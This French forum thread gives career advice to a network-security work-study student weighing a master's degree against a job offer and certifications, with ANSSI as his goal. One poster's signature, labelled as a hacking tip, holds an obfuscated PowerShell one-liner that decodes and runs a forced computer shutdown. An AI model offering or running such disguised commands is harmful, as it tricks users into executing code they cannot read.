Annonce

Réduire
Aucune annonce.

BAC +5 ou CDI

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • BAC +5 ou CDI

    Bonjour,

    Actuellement en licence PRO Réseau et Sécurité en alternance, ma société (une mairie) me propose un poste d'administrateur réseau et sécurité.

    Ma question est la suivante, est-il viable de ne pas poursuivre en BAC + 5 sachant que la mairie m'autorise à suivre les formations certifiantes de mon choix ( j'envisage CEH dans un premier temps, mais je suis preneur de conseils sur les formations à choisir).

    Je m'interroge fortement là-dessus car j'ai entendu dire qu'une certification était quand même un sacré plus. En outre je passerai aussi les concours de catégorie B et A de la fonction publique.

    Tout cela pour atteindre un objectif futur qui serait d'entrer à L'ANSSI.

    Voilà,
    Par avance merci,
    Cordialement




  • #2
    Bonjour,

    Qui peut le plus peut le moins ! Rien n'empêche d'avoir son BAC + 5 et d'avoir les certifications par la suite... Pour le reste, et aux vues de l'importance de ce métier (sécurité informatique), la catégorie B dans un service public est du foutage de gueule (en terme de salaire). Tu devrais être cadre de la fonction publique, soit la catégorie A.

    Commentaire


    • #3
      Tout d'abord merci de votre réponse. Il m'ont d'abord proposé la catégorie A mais mon chef n'étant que catégorie B il ne voyait pas ouvrir un poste au dessus du sien.
      Il m'est donc fortement conseiller de passer le BAC + 5 ? J'ai aussi appris que pour faire une VAE c'était pas gagner...

      Commentaire


      • #4
        Si l'ANSSI est ton objectif,et que tu préfères les challenges aux pantoufles confortables, aucune hésitation à avoir : BAC+5.
        L'ANSSI ne recrute que très peu en dessous, même pour les profils juniors. Genre : https://www.ssi.gouv.fr/emploi/analy...alveillants-3/

        Et c'est deux fois plus chiant (et cher) de valider un BAC+5 en formation continue une fois que t'es déjà actif (et je ne parle pas des VAE).
        Pour le moment (et on ne peut que le déplorer), les certifications, aussi prestigieuses soient-elle, ne viennent pas à bout de la barrière "Pas de BAC+5".
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Envoyé par ELSora Voir le message
          Il m'ont d'abord proposé la catégorie A mais mon chef n'étant que catégorie B il ne voyait pas ouvrir un poste au dessus du sien.
          Eh bien ayant pas mal de bouteille, je leur aurai dis de faire passer leur chef catégorie A et dans ce cas on pourrait rediscuter, mais j'ai été jeune, et je sais que ce qu'on regarde avant tout ce n'est pas l'évolution de carrière.

          Le fait est que la question à se poser est "quel est le bon choix pour ne pas regretter ?". En ce qui me concerne, avec beaucoup de recul, sans hésiter je choisirai de continuer mes études.
          En catégorie B, tu vas toucher une misère comparée à tes compétences, et ne les sous-estime jamais

          Commentaire


          • #6
            Envoyé par fred Voir le message

            Eh bien ayant pas mal de bouteille, je leur aurai dis de faire passer leur chef catégorie A et dans ce cas on pourrait rediscuter, mais j'ai été jeune, et je sais que ce qu'on regarde avant tout ce n'est pas l'évolution de carrière.

            Le fait est que la question à se poser est "quel est le bon choix pour ne pas regretter ?". En ce qui me concerne, avec beaucoup de recul, sans hésiter je choisirai de continuer mes études.
            En catégorie B, tu vas toucher une misère comparée à tes compétences, et ne les sous-estime jamais
            C'est la question que je pose tout les jours en ce moment et bien évidemment j'ai pris en compte vos différentes remarques, il serait donc préférable à priori de continuer mes études. J'ai reçu la proposition on est sur du 2180 brut ce qui est franchement raisonnable.
            Du coup je me dit , est-ce possible d'atteindre le bac+5 par le biais de la VAE après 5 an d'expérience en tant que Administrateur réseau et sécurité ?
            Sachant que je vais évoluer à terme sur du categorie A vue que je vais passer le concour ( mon chef aussi ) , ce concour sera-t-il reconnue en fonction d'état ( ANSSI ?)

            Commentaire


            • #7
              Bonsoir,

              Avec un Bac+5 ce brut pourrait être ton net, voir plus.
              Je te conseille de poursuivre les études, tu auras accès plus facilement à des postes plus importants, avec plus de responsabilités, et tu auras plus de facilité à te faire embaucher.

              La France est un pays où le diplôme est très reconnue et pris en compte.

              Commentaire


              • #8
                Envoyé par ELSora Voir le message
                Du coup je me dit , est-ce possible d'atteindre le bac+5 par le biais de la VAE après 5 an d'expérience en tant que Administrateur réseau et sécurité ?
                C'est toujours possible, mais c'est dur ! Il faut en même temps que son boulot, écrire un mémoire avec du contenu... démontrant tes compétences à ce niveau.
                Je te conseille donc de regarder les compétences que l'on acquière avec un BAC +5 et vérifier que celles demandées dans ton travail correspondent.

                Pour ton autre question, il faut demander à tes futurs collègues de travail, mais il me semble que les concours publics sont effectivement reconnu pour le service public. Pour le privé, se sont en général les certifications RNCP, mais je ne suis pas du tout sûr, à vérifier donc.

                Commentaire

                Chargement...
                X